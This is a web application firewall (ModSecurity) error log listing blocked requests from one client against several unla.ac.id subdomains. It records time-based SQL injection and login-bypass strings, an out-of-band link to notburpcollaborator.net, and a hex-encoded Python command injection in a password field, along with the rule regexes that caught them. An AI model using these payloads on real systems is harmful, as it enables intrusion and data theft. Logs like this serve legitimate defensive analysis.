[Tue Aug 29 11:35:25.321401 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAPY1sIAAAAh"]
[Tue Aug 29 11:35:25.322895 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAASEJaYAAAAE"]
[Tue Aug 29 11:35:25.335365 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAVJXmoAAAAA"]
[Tue Aug 29 11:35:25.341097 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAUDQU8AAAA7"]
[Tue Aug 29 11:35:25.346994 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAVmuLwAAAAT"]
[Tue Aug 29 11:35:25.354754 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAT9PRUAAAA1"]
[Tue Aug 29 11:35:25.371946 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAVRxe4AAAAQ"]
[Tue Aug 29 11:35:25.379838 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAASI0GoAAAAG"]
[Tue Aug 29 11:35:25.387596 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jcCo-f0AAATzVLEAAAAx"]
[Tue Aug 29 11:35:26.343373 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVvlHkAAAAe"]
[Tue Aug 29 11:35:26.344045 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVmuL0AAAAT"]
[Tue Aug 29 11:35:26.345052 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVRxe8AAAAQ"]
[Tue Aug 29 11:35:26.348314 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAUR88IAAABI"]
[Tue Aug 29 11:35:26.377300 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVPX5EAAAAF"]
[Tue Aug 29 11:35:26.380422 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jsCo-f0AAATge@AAAAAl"]
[Tue Aug 29 11:35:27.321754 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAATge@EAAAAl"]
[Tue Aug 29 11:35:27.326198 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASHh-8AAAAD"]
[Tue Aug 29 11:35:27.326712 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAATzVLQAAAAx"]
[Tue Aug 29 11:35:27.330003 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUJI1AAAABB"]
[Tue Aug 29 11:35:27.343323 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUNao4AAABF"]
[Tue Aug 29 11:35:27.340702 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASEJaoAAAAE"]
[Tue Aug 29 11:35:27.347360 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAATavxcAAAAg"]
[Tue Aug 29 11:35:27.349343 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASHiAAAAAAD"]
[Tue Aug 29 11:35:27.349843 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUR88QAAABI"]
[Tue Aug 29 11:35:27.331442 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11j8Co-f0AAATOBAcAAAAH"]
[Tue Aug 29 11:35:27.387833 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVJXm4AAAAA"]
[Tue Aug 29 11:35:28.306606 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/banker/index.php"] [unique_id 